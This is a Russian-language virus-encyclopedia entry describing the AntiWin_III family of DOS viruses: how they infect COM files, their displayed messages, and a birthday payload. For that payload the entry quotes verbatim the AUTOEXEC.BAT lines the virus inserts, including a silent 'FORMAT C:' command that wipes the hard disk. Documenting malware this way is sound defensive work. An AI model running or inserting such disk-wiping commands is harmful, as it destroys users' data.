Энциклопедия компьютерных вирусов

         

AntiWin_III, семейство


Опасные нерезидентные вирусы. Ищут COM-файлы в текущем и родительских каталогах и записываются в их конец. Если найден файл с именем WIN*.COM, вирусы записывают вместо него программу, которая при запуске выводит текст и возвращает управление DOS:

This program requires Microsoft Windows

"AntiWin_III.465" также содержит строку:

->AntiWindows<-

"AntiWin_III.1342" в зависимости от установленного BIOS выводит текст и возвращает управление DOS:

This computer is virus protected

2-го декабря этот вирус выводит текст:

Hi ! I'm AntiWindows v.2.0 ! Сегодня мой ДЕНЬ РОЖДЕНИЯ ! Хотите меня поздравить ? (y/n)

В случае ответа 'Y' выводит текст и возвращает управление DOS:

Ааааааагромное спасибо ! Отдыхайте, сегодня работать не будем !

В случае 'N' выводит текст:

А зря ! Я обиделся :( Мстить буду :-E~

Затем записывает в начало файла C:\AUTOEXEC.BAT команду "GOTO LMD", а в конец - команды, форматирующие винчестер компьютера (грамотность - по оригиналу):

:LMD @ECHO OFF CLS ECHO. ECHO. ECHO. ECHO. ECHO Я обидился ! Надо было все-таки поздравить меня с днем рождения ! ECHO. ECHO Y | C:\DOS\FORMAT C: >nul ECHO Bye ! See you next time ! C:\DOS\BIRTHDAY.COM PAUSE >NUL CLS

В файл C:\DOS\BIRTHDAY.COM вирус записывает код, стирающий содержимое винчестера. Вирус также содержит строки, последняя дважды зашифрована:

->AntiWindows<- (C)1997 by Alexey C. C:\autoexec.bat C:\DOS\birthday.com Я мстю ! >Г..-ЧМО MRTK - SUXXX ! <



Содержание раздела